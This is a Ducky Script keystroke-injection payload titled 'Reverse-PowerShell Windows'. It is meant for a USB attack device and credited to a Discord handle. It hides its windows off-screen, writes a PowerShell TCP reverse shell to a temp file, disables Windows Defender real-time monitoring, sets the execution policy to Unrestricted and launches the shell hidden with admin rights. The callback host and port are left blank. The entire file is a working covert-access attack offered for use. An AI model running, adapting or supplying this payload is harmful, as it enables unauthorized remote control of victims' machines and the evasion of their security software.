REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
REM Description: Reverse-PowerShell Windows. I am not responsible for your actions.
REM Version: 1.0
REM Category: Remote_Access
DELAY 750
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 750
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING Add-Content “$env:TEMP\34593.ps1” ‘$c = New-Object System.Net.Sockets.TCPClient(“”,);$s = $c.GetStream();[byte[]]$b = 0..255|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $d 2>&1 | Out-String );$sb2 = $sb + “PS ” + (pwd).Path + “> “;$sby = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sby,0,$sby.Length);$s.Flush()};$c.Close()’
ENTER
DELAY 750
STRING Set-MpPreference -DisableRealtimeMonitoring $true
DELAY 500
ENTER
DELAY 750
STRING start-Process powershell.exe -windowstyle hidden “$env:TEMP\34593.ps1”
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 1000
STRING C:\Windows\config-34593.ps1
ENTER
DELAY 1000
ALT F4
DELAY 750
GUI r
DELAY 750
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 750
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 750
STRING m
DELAY 750
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy ‘Unrestricted’ -Scope CurrentUser -Confirm:$false
ENTER
DELAY 750
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-34593.ps1
ENTER